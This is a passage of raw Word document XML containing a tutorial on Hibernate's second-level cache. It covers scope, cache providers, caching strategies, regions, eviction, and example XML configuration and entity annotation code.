      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a mechanism used to cache entities, collections, and queries across sessions within the same </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Unlike the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-level cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is associated with a single </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">and is automatically enabled, the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second-level cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is shared among all sessions that are created from the same </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and needs to be explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91FAB6"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he second-level cache is useful for improving performance by reducing database access, especially for frequently accessed and rarely updated data. It helps in reducing the number of queries sent to the database for the same data, which can improve the application's scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174BE542" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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Key Points about Second-Level Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A6DB8F" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The second-level cache is scoped to the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning all sessions created by the same </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can access the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41DAD5" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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Enabled via Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike the first-level cache, which is always enabled in Hibernate, the second-level cache must be explicitly configured by enabling it in the Hibernate configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62750E12" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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ache Providers</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hibernate allows you to use different cache providers (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ehcache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Infinispan</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OSCache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.). You can choose the cache provider based on your application’s needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9A992" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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aching Strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate supports different caching strategies such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB287E" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="200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Entity Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching of entity objects (e.g., Customer, Product).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD5D89" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="200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ollection Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching of collections (e.g., lists, sets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA4309" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="200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Query Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching of the result of HQL or SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A8A42" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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ache Regions</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The second-level cache uses </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cache regions</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each type of data (entities, collections, queries) can have a separate cache region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436E595" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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Types of Second-Level Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79127CA3" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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Entity Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This cache stores entities (rows of a table). When an entity is loaded by its primary key (e.g., session.get() or session.load()), it will first check if the entity is present in the cache. If it is, it will be returned from the cache instead of querying the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55446EA0" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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ollection Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This cache stores collections, i.e., relationships between entities (e.g., @OneToMany or @ManyToMany mappings). If a collection is requested, it is first checked in the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54E23E" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200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Query Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate also supports caching the results of queries (HQL, native SQL, or Criteria API queries). This reduces the number of times a query is executed against the database if the query and its parameters haven't changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C78307F" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E97F62" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2009"/>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Entity Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When an entity is requested, Hibernate first checks if the entity is already available in the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-level cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Session cache). If not, it then checks the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second-level cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if enabled).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC8A731" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2009"/>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Storing in Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When an entity or collection is fetched from the database for the first time, Hibernate stores it in the second-level cache, where it remains available for subsequent sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C305C7" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2009"/>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ache Eviction</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The data in the second-level cache can be evicted or invalidated either manually or automatically. For example, an entity might be evicted from the cache when it is updated, deleted, or if the session expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C16A3F" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2009"/>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ache Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Cache synchronization ensures that the cache is kept consistent with the database. For example, if an entity is modified, the cache needs to be updated to reflect those changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1815F39E" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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Configuring Second-Level Cache in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2FAA46"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o enable the second-level cache in Hibernate, you need to perform the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A409E9" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2010"/>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onfigure the Cache Provider</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in hibernate.cfg.xml or application properties file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581CF840"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t;hibernate-configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C8976"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session-factory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E26861"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 Enable second-level cache --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB3C62"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property name="hibernate.cache.use_second_level_cache"&gt;true&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D87210" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259CB052"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 Specify cache provider (e.g., Ehcache) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072511D5"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property name="hibernate.cache.provider_class"&gt;org.hibernate.cache.ehcache.EhCacheProvider&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429DC44" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F3E5E8"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 Specify cache region factory --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7E0E0"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property name="hibernate.cache.region.factory_class"&gt;org.hibernate.cache.ehcache.EhCacheRegionFactory&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0AEB49"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session-factory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1174E"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t;/hibernate-configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317BF42" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2011"/>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Annotate Entities for Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate entities can be marked with @Cache to indicate that they should be cached in the second-level cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71114275"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lastRenderedPageBreak/>
        <w:t>@Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F6988"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Cache(usage = CacheConcurrencyStrategy.READ_WRITE) // Define caching strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF056F4"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ublic class Product {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44B299"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8456E5"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C067BAF"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3E961" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DCEB01"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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B306B1D"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A2B00" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2012"/>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onfigure Cache Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can configure different cache strategies using annotations or in the configuration file. The most common strategies are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA07565" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2012"/>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READ_ONLY</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
